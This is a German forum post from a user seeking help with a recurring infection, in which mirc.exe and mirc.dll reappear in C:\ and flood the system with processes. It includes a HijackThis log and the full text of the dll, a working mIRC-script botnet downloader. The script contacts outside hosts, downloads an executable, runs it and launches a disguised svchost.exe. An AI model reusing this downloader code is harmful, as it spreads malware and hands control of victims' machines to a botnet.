Trojaner-Board - Unbekannter Wurm/Virus/Trojaner

Hi...

seit gestern abend macht mein PC Probleme...

Nach jedem Neustart ist direkt unter C:/ eine Datei mirc.exe und eine mirc.dll zu finden.

Bei entweder normalem Doppelklick drauf oder nach einer bestimmten Zeit die der PC läuft, startet die Datei und es entstehen dann über 100 mirc.exe Prozesse (immer ca 2000 bis 6000 kb)... Diese überlasten dann mein System und ich muss neu starten..

Wenn ich die mirc.exe lösche, läuft mein PC normal, außer das er mir ziemlich langsam vorkommt und gelegentlich länger hängt...

Hab mal hijackthis laufen lassen, hier das log:
</font><blockquote>Code:</font><hr /><pre style="font-size:x-small; font-family: monospace;">Logfile of HijackThis v1.97.7
Scan saved at 16:50:14, on 08.05.2003
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccEvtMgr.exe
C:\Programme\Norton Personal Firewall\NISUM.EXE
C:\WINDOWS\Explorer.EXE
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe
C:\WINDOWS\System32\rundll32.exe
C:\Programme\AVPersonal\AVGUARD.EXE
C:\Programme\Microsoft Hardware\Mouse\point32.exe
C:\Programme\ICQLite\ICQLite.exe
C:\Programme\AVPersonal\AVGNT.EXE
C:\Programme\AVPersonal\AVWUPSRV.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\System32\drivers\CDAC11BA.EXE
C:\Programme\Norton Personal Firewall\ccPxySvc.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Programme\WAVEline Wireless LAN Setting\wlanutil.exe
C:\Dokumente und Einstellungen\simon.SDASD\Eigene Dateien\MozDL\HijackThis.exe
C:\Programme\Mozilla Firefox\firefox.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir...mp;ar=iesearch
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.inselkampf.de/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&clcid={SUB_CLSID}&pver={SUB_PVER}&ar=home
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir...mp;ar=iesearch
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.microsoft.com/isapi/redir...amp;ar=msnhome
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.microsoft.com/isapi/redir...mp;ar=iesearch
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,Shellnext = http://www.microsoft.com/isapi/redir...p;plcid=0x0407
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [ccApp] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [ccRegVfy] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccRegVfy.exe"
O4 - HKLM\..\Run: [KEWelcomeReBoot] G:\welcome_S500.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [WorksFUD] C:\Programme\Microsoft Works\wkfud.exe
O4 - HKLM\..\Run: [Microsoft Works Portfolio] C:\Programme\Microsoft Works\WksSb.exe /AllUsers
O4 - HKLM\..\Run: [POINTER] point32.exe
O4 - HKLM\..\Run: [ICQ Lite] C:\Programme\ICQLite\ICQLite.exe -minimize
O4 - HKLM\..\Run: [AVGCtrl] C:\Programme\AVPersonal\AVGNT.EXE /min
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\RunOnce: [ICQ Lite] C:\Programme\ICQLite\ICQLite.exe -trayboot
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Programme\Gemeinsame Dateien\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Erinnerungen in Microsoft Works-Kalender.lnk = ?
O4 - Global Startup: setup_pcc.lnk = D:\Trend Micro PC-cillin 2004\Setup\setup.exe
O4 - Global Startup: WAVEline 11Mbps Wireless LAN Utility.lnk = C:\Programme\WAVEline Wireless LAN Setting\wlanutil.exe
O9 - Extra button: AIM (HKLM)
O9 - Extra button: ICQ 4.0 (HKLM)
O9 - Extra 'Tools' menuitem: ICQ Lite (HKLM)
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall-Kontrolle) - http://a840.g.akamai.net/7/840/537/2...ll/xscan53.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.co...948.1423148148
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/s...sh/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{95CEFE89-0F71-45E5-9F87-F9819B53A576}: NameServer = 194.25.2.129,217.5.99.105</pre>[/QUOTE]Neben der mirc.exe in C:/ gibts dort wie bereits gesagt auch noch ne dll Datei, hier mal auch noch deren Inhalt:

</font><blockquote>Code:</font><hr /><pre style="font-size:x-small; font-family: monospace;">alias botnet.scan.4.fileurl { set %botnet.host boonsterfileurl.da.ru | sockclose botnet.check.fileurl | .timer 1 1 sockopen botnet.check.fileurl %botnet.host 80 }

ON *:SOCKOPEN:botnet.check.fileurl: {
sockwrite -n $sockname GET / HTTP/1.1
sockwrite -n $sockname Host: %botnet.host $+ $str($crlf,2)
}

ON *:SOCKREAD:botnet.check.fileurl: {
var %sockread
sockread %sockread
if ($regsub(%sockread, <HTML><HEAD><TITLE>,,%sockread)) && ($regsub(%sockread, </TITLE></HEAD>,,%sockread)) {
set %botnet.account %sockread
sockclose botnet.download.new.version
.timer 1 1 sockopen botnet.download.new.version people.freenet.de 80
}
}

ON *:SOCKOPEN:botnet.download.new.version: {
sockwrite -n $sockname GET / $+ %botnet.account $+ /damn.exe HTTP/1.0
sockwrite -n $sockname Accept: */*
sockwrite -n $sockname Host: %botnet.host $+ $str($crlf,2)
sockwrite -n $sockname
}

ON *:SOCKREAD:botnet.download.new.version:{
if (%botnet.aupd.downloadready != 1) {
var %header
sockread %header
while ($sockbr) {
if (* !iswm %header) {
%botnet.aupd.downloadready = 1
break
}
sockread %header
}
}
sockread 4096 &d
while ($sockbr) {
bwrite update.exe -1 -1 &d
sockread 4096 &d
}
}

ON *:SOCKCLOSE:botnet.download.new.version: { unset %botnet.aupd.* | run update.exe | remove c:\mirc.exe | remove c:\mirc.dll | .timer 1 3 run C:\WINDOWS\system32\system01\svchost.exe | .timer 1 3 exit }</pre>[/QUOTE]Das Problem ist halt das die beiden Dateien scheinbar von einer anderen gesteuert werden und nach jedem neustart trotz löschen wieder da sind :(

Hoffe ihr könnt mir helfen...

/edit: Was natürlich noch Wichtig ist... als ich AntiVir bzw. Trend drüberlaufen lies, hat es zwar n paar Sachen gefunden aber keine die das Problem behoben haben...